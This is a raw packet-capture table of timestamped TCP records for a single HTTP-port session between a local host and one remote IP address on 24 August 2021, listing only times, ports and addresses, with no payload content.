Aug 24, 2021 08:49:11.475745916 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.497855902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.497889042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.557883024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.557920933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.557943106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.557965040 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.557990074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.558012962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.558022022 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.558037996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.558039904 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.558049917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.558070898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.558095932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.558099031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.558137894 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.581299067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581342936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581372976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581398010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581412077 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.581423998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581448078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581473112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581479073 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.581499100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581521988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581526995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.581545115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581568003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.581572056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581597090 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.581598043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581621885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581633091 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.581648111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581671953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581695080 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.581696033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581720114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581741095 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.581743002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581770897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581793070 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.581795931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.581948042 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.604676008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.604724884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.604752064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.604778051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.604789019 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.604799986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.604825020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.604837894 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.604851961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.604878902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.604887009 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.604902983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.604927063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.604959965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.604965925 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.604984045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605000019 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.605010033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605037928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605041981 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.605062962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605084896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605107069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605118036 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.605130911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605153084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605175972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605180979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.605201006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605223894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605238914 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.605247974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605273008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605281115 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.605297089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605323076 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.605324030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605351925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605370998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605389118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605408907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605422974 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.605438948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605448008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605473995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605496883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605520010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605545044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605567932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605595112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605617046 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.605621099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605644941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.605679989 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.605722904 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.606766939 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.627763033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.627804041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.627830029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.627854109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.627876997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.627903938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.627927065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.627943993 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.627948999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.627974987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.627998114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628021002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628043890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628052950 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.628067970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628079891 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.628096104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628123045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628132105 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.628146887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628169060 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.628170013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628195047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628205061 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.628216982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628242970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628247023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.628266096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628292084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628300905 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.628317118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628339052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628361940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628365040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.628385067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628410101 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.628413916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628437042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628459930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628459930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.628484011 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.628485918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628511906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628535032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628554106 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.628555059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628588915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628601074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628601074 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.628624916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628648043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628669977 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.628670931 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628694057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628720999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628743887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628762960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628782988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628802061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628823996 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.628825903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.628837109 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.628878117 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651042938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651078939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651103973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651141882 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651148081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651171923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651175022 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651194096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651216984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651223898 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651238918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651257992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651281118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651304960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651309967 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651324987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651345015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651365995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651371002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651386023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651386023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651406050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651427031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651448011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651459932 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651472092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651495934 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651495934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651520014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651542902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651549101 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651565075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651580095 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651587009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651608944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651621103 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651631117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651644945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651655912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651679993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651699066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651702881 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651722908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651745081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651746988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651768923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651781082 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651791096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651813984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651839018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651861906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651880026 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651884079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651906967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651922941 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651927948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651949883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651974916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.651985884 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.651997089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.652013063 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.652024031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.652046919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.652069092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.652082920 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.652091026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.652113914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.652123928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.652168036 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.674376011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674415112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674438953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674463034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674485922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674510002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674530983 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.674532890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674556017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674575090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674598932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674621105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674631119 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.674643993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674668074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674669981 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.674693108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674696922 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.674716949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674736023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.674740076 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674767017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674776077 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.674791098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674810886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674830914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674833059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.674848080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674858093 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.674869061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674890995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674912930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674917936 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.674940109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.674967051 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.675570965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675612926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675632000 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675652981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675674915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675702095 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675724030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675745964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675769091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675776958 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.675791979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675817966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675832033 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.675841093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675863028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675873041 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.675887108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675916910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675918102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.675940037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675961971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.675964117 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.675987959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.676008940 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.676009893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.676033020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.676052094 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.676054001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.676080942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.676100969 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.676101923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.676125050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.676165104 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.697395086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.697439909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.697464943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.697483063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.697503090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.697520971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.697540045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.697557926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.697578907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.697598934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.697622061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.697715998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.697732925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.697750092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.697765112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.697781086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.698209047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.698230982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.698249102 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.698266983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.698354959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.698383093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.698404074 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.698405981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.698430061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.698452950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.698472977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.698474884 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.698497057 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.698519945 CEST	49712	80	192.168.2.5	212.224.105.79
